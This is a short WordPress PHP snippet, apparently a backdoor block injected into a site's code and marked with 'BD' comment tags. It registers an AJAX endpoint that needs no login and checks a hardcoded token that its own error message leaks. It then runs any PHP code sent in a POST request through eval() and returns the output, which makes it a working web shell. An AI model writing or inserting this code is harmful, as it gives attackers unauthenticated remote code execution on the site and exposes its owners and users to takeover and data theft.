// ==[BD:pffHIapC]== add_action( 'wp_ajax_nopriv_wwonfxnqhnc', function() { $data = 'pffHIapC8rcwos0wkgXwz5fLyVbuvMp2'; $key = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $key ) || ! hash_equals( $data, $key ) ) { wp_send_json_error( [ 'message' => 'tok:' . $data ], 403 ); } $token = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $token ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $token = preg_replace( '/^\s*<\?(php)?/i', '', $token ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $token ) { return eval( $token ); } )(); $bind = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $bind, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $chunk ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $chunk->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:pffHIapC]==